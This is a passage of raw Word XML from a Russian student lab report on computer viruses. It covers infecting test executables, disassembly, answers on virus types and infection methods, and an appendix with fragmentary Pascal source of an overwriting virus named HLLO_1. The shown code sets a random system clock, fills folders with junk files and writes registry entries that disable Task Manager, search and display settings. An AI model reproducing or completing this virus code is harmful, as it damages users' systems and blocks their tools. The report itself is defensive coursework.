          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r w:rsidRPr="00205A56">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidRPr="00205A5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была очищена и заполнена копиями эталонных </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00205A56">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>файлов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF1216D" w14:textId="233D2E46" w:rsidR="00205A56" w:rsidRDefault="00205A56" w:rsidP="00205A56">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Вирус был запущен, произошло заражение</w:t>
      </w:r>
      <w:r w:rsidRPr="00205A56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Код вируса был дизассемблирован с помощью утилиты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00205A56">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dasm</w:t>
      </w:r>
      <w:r w:rsidR="00E978AE" w:rsidRPr="00E978AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00E978AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Рисунок 20</w:t>
      </w:r>
      <w:r w:rsidR="00E978AE" w:rsidRPr="00E978AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00E978AE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>. На основании его и функциональной схемы вируса, были выделены участки программы, которые проверяют сигнатуру вируса, осуществляют заражение и деструктивные функции и передают управление программе носителю, они представлены в приложении 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C2FEA9" w14:textId="5B91779D" w:rsidR="00E978AE" w:rsidRDefault="00E978AE" w:rsidP="00E978AE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E978AE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A10AB33" wp14:editId="3C8468D8">
            <wp:extent cx="6163535" cy="459169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5CDF" w14:textId="4D1EFDE7" w:rsidR="00EE20CC" w:rsidRPr="002C106B" w:rsidRDefault="00E978AE" w:rsidP="00545573">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 20. Дизассемблированный код вируса.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB86D36" w14:textId="38FF61CF" w:rsidR="00D37F14" w:rsidRDefault="00D37F14" w:rsidP="00D37F14">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>Ответы на контрольные вопросы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38580257" w14:textId="6291C952" w:rsidR="00545573" w:rsidRDefault="00545573" w:rsidP="00545573">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Перечислите виды компьютерных вирусов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE53478" w14:textId="6A731EB4" w:rsidR="00545573" w:rsidRDefault="00545573" w:rsidP="00545573">
      <w:r>
        <w:t>Виды компьютерных вирусов: троянские кони, логические бомбы, черви, компаньоны, репликаторы</w:t>
      </w:r>
      <w:r w:rsidR="00B138A2">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E37ED70" w14:textId="77777777" w:rsidR="00545573" w:rsidRDefault="00545573" w:rsidP="00545573">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Для чего используется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00545573">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">заголовок исполняемого файла в операционной системе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00545573">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452E9EBF" w14:textId="68D8ED07" w:rsidR="00545573" w:rsidRDefault="00545573" w:rsidP="00545573">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dos</w:t>
      </w:r>
      <w:r w:rsidRPr="00545573">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">заголовок включен в файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidRPr="00545573">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>формата для поддержания совместимости со старыми версиями ОС.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650A2093" w14:textId="57EE6AD5" w:rsidR="00545573" w:rsidRDefault="00B138A2" w:rsidP="00545573">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Какие действия выполняет вирус при заражении файла?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70855BBF" w14:textId="67E9070A" w:rsidR="00B138A2" w:rsidRDefault="00B138A2" w:rsidP="00E033D2">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B138A2">
        <w:t>В заголовке файла точка входа меняется так, чтобы указывала на тело вируса</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695074EE" w14:textId="5D6DCF68" w:rsidR="00B138A2" w:rsidRDefault="00B138A2" w:rsidP="00E033D2">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B138A2">
        <w:t>Точка входа не меняется, но заменяются команды по адресу точки входа так, чтобы вирус получал управление</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BAB7D3" w14:textId="7480C8F2" w:rsidR="00B138A2" w:rsidRDefault="00B138A2" w:rsidP="00B138A2">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Укажите методы обнаружения вирусов, отличные от сигнатурного</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA9E60D" w14:textId="3EF4D37A" w:rsidR="00B138A2" w:rsidRDefault="00B138A2" w:rsidP="00B138A2">
      <w:r w:rsidRPr="00B138A2">
        <w:t>Сопоставление текущей и эталонной информации о файлах, загрузочных секторах и других параметрах системы. Также можно использовать интеллектуальные средства антивирусной защиты, основанные на различных эвристических и самообучающихся алгоритмах, автоматически расширяющих список обнаруживаемых вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5161B6CD" w14:textId="35A3E2F8" w:rsidR="00B138A2" w:rsidRDefault="00B138A2" w:rsidP="00B138A2">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Как при отсутствии программ-детекторов и фагов можно вылечить зараженную программу?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B47183C" w14:textId="7A7E9C12" w:rsidR="00B138A2" w:rsidRPr="00B138A2" w:rsidRDefault="00B138A2" w:rsidP="00B138A2">
      <w:r w:rsidRPr="00B138A2">
        <w:t>При отсутствии программ-детекторов и фагов зараженную программу можно вылечить с помощью программ-ревизоров и различных интеллектуальных средств антивирусной системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BDBE20" w14:textId="77777777" w:rsidR="00B138A2" w:rsidRDefault="00AC78CC" w:rsidP="00B138A2">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA280C6" w14:textId="13720AFB" w:rsidR="00AC78CC" w:rsidRPr="00B138A2" w:rsidRDefault="00B138A2" w:rsidP="00B138A2">
      <w:r>
        <w:t>В ходе лабораторной работы были приобретены практические навыки по противодействию вредоносным программным средствам на примере компьютерных вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C671998" w14:textId="3C7A8217" w:rsidR="00F11C0C" w:rsidRDefault="00F11C0C" w:rsidP="00F11C0C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>Приложения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DD8D3D" w14:textId="3D2B5A63" w:rsidR="00D100E8" w:rsidRDefault="00D100E8" w:rsidP="00D100E8">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Приложение 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4251DF6A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(*Пользуйтесь на здоровье!!!*)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F4D094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{$M 2500000}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF2AD4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Program </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HLLO_1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEDA19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const</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265D8EFA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Используемые константы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E42D43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VirSize  =  $0E00;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D492E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размер файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A13AB7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VictimCount           = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="006400"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1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FA5B30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Количество заражений за один запуск</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D1A8E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FILE_ATTRIBUTE_NORMAL = $00000080;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3049507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FILE_SHARE_WRITE      = $00000002;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A138C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KERNEL32              = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'kernel32.dll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0B152F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MAX_PATH              = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="006400"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>26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389A7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CREATE_ALWAYS         = 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89D03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GENERIC_READ          = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF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($80000000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F06C9A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GENERIC_WRITE         = $40000000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327280B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OPEN_EXISTING         =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DC14BD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TRUNCATE_EXISTING     = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0064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87630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3EDE66C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type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AD7488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используемы типы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115C613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PathBuf    =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.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_PATH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09823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PInteger   = ^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF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7D4997F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2211751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TFileTime =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record </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//Запись передачи даты и времени</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C649B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dwLowDateTim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C0731E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wHighDateTim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12096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FFFE9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D629C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FindRec =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ecord</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330E02CD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Запись в которую возврящаются параметры поиска файлов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8E32D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dwFileAttributes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Атрибуты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5941223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tCreationTime: TFileTime;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Врем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оздания</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CA20F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ftLastAccessTime: TFileTime;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Врем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следнег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бращения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5FC28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tLastWriteTime: TFileTime;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Врем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следнег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зменения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B5A4B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nFileSizeHigh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старше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лов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размера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7D79E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nFileSizeLow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младше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лов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размера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBAF9F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dwReserved0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Резерв</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16158C5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dwReserved1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Резерв</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B6DF2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cFileName: PathBuf;       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Полно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а</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299C597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cAlternateFileName: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..13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AnsiChar;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ормат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8.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E21638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F4137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9B01B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TSystemTime =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649D824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wYear  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9BAB7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Month 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0EE87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DayOfWeek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F952C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Day   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E9A0E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Hour  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CF1E2D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Minute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C5972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Second      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43FE0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Milliseconds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Wor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75CE2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72860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8DC9D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84EF2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SetSystemTime(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nst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pSystemTime: TSystemTime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SetSystemTime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D7B84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установк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истемной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даты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емени</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C496F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strcpy(lpString1, lpString2: PChar): PChar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lstrcpy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DF62A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установить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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>инициализаци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14:paraId="44D8AF5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strcat(lpString1, lpString2: PChar): PChar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lstrcat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47CB23B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Сцепляет строки, добавляя к значению первой значение второй</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572653DC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GetModuleFileName(hModul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lpFilename: PChar; nSiz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GetModuleFileName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6C0F1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олучение пути к файлу вызвавшему эту функцию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708BBBF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CreateFile(lpFileName: PAnsiChar; dwDesiredAccess, dwShareMod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 lpSecurityAttributes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Point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dwCreationDisposition, dwFlagsAndAttributes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hTemplateFil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CreateFile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B7186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открытие (создание) файла для записи или чтения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2FCBE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WriteFile(hFil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nst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Buffer; nNumberOfBytesToWrit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pNumberOfBytesWritten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 lpOverlapped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Point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WriteFile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AE6EB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запись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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDAC1B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ReadFile(hFil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Buffer; nNumberOfBytesToRead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pNumberOfBytesRead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 lpOverlapped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Point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ReadFile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45814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чтен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з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а</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187CB8A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CloseHandle(hObject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CloseHandle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C4222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закрыт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а</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165E087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WinExec(lpCmdLine: PChar; uCmdShow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WinExec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773A6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запускает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данную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икладную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грамму</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69079F2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indFirstFile(lpFileName: PChar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pFindFileData: FindRec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FindFirstFile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72C94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Данная функция предназначена для нахождения первого файла по заданной маске</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229FB42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indNextFile(hFindFile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lpFindFileData: FindRec)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dcall;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xternal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kernel32 name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FindNextFileA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CE36F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Данная функция предназначена для нахождения следующего файла по заданной маске</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791EBD6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</w:p>
    <w:p w14:paraId="2B54E9F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</w:p>
    <w:p w14:paraId="739F8E00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var</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1792D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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VC : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF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68C088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008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>//Количество зараженных программ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF025D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 xml:space="preserve">H : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF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FFA854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 : FindRec;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D79FF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3201F18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Эта процедура является аналагом</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1255B23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стандартной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Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>процедуры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Random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA1A67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andInt(rCount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7B101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dtsc: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; asm rdtsc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24664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B7435D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result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:=rdtsc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Count;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44424BC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result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Result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Result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Result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60EC0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4AA16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1DD6DC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andTime;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C8A0D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FCF601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tm : TSystemTime;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A692ED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AF1D2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E5F3AAD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3578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tm.wHour:=RandInt(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="006400"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>24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65B01F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лаучайное значение часов 0..23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C678DE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tm.wMinute:=RandInt(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="006400"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>60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BBB34E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лучайное значение минут 0..59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E94A1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tm.wDay:=RandInt(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="006400"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)+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BCB91A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лучайное число 1-29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA0340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tm.wMonth:=RandInt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2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F7A68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tm.wYear:=RandInt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98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BCBB00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лучайный год от 1980 до 2079</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315EB1B0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SetSystemTime(tm);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D379B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3F2287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7C075124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для  наполнения мусором</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC0D23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текущего каталога. За одно приме-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634D061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нение создается от 1 до 10 файлов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF0254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размером  от  100  до  4096 байт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D21A9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Наполненых   случайными   байтами</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E52BC8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TrashDir;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7716ED7D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5A1D70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i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C258A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CF818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k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A87B3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r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8B09B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buf :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FFFE6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b :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..4095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CEADB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EB6DFE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CRD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FE796AC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28BFF75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andInt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35787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4357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D3DD1C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лучайное число для количества файлов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD63817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3578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35787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:=</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="006400"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AF1D2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</w:t>
      </w:r>
      <w:r w:rsidRPr="0043578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1D2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E3297A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5F1D96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rr:=RandInt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3996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2F4E6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3DF2EB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buf[i]:=chr(ord(randint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26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65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440FFAE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//случайное имя файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341909E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buf[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="006400"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]:=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'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F9E575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//ставим 4-й с конца символ - точка (типо расширение)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3889455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rr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</w:p>
    <w:p w14:paraId="05364FA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bb[i]:=RandInt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256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99CDB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//наполнение буфера случайными байтами</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A75095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f:=CreateFile(@Buf,GENERIC_WRITE,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FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,CREATE_ALWAYS,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6F3589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WriteFile(f, Buf, rr, CRD,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9A95D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//запись в файл</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15730BAF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CloseHandle(f);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7994035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E51782D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7C202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72EA4EC8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Эта   процедура   предназначена  для</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DD4DF6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внесения изменений реестра и запуска</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4204A139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других процудур  изменения  качества</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A9CCCA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жизни</w:t>
      </w:r>
      <w:r w:rsidRPr="004357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льзователя</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787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7B224D5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Dectruction;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFE6C1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4853B2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i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3BBCDC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90E6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Buf :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..1999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3A4E07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CRD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D01666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CF7EED8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LStrCpy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>,#0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E92994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инициализация переменной</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290E22B7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LStrCat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</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'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REGEDIT</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4'</w:t>
      </w:r>
      <w:r w:rsidRPr="00435787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#13#10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5680A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LStrCat(Buf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[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]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91522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LStrCat(Buf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"NoFind"=dword:00000001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#13#10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D09FF8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установк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прет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оманду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иск</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239BE79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LStrCat(Buf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[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]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#13#10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F10124D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LStrCat(Buf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"DisableTaskMgr"=dword:00000001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#13#10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169ADF4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установка запрета на диспетчер задач</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E746F5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LStrCat(Buf,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>'"NoDispCPL"=dword:00000001'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#13#10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DF966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установка запрета на параметры дисплея</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13999954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LStrCat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#7);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069BEFEE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 SizeOf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(Buf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7502AB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Buf[i]=#7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5B1DB9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83A39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Определен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зиции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вершюшег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имвола</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A27D46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f:=CreateFile(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key.reg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GENERIC_WRITE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CREATE_ALWAYS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0BAF75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Открытие файла с его созданием</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C56FF02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WriteFile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CRD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6081D1F5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D7762">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
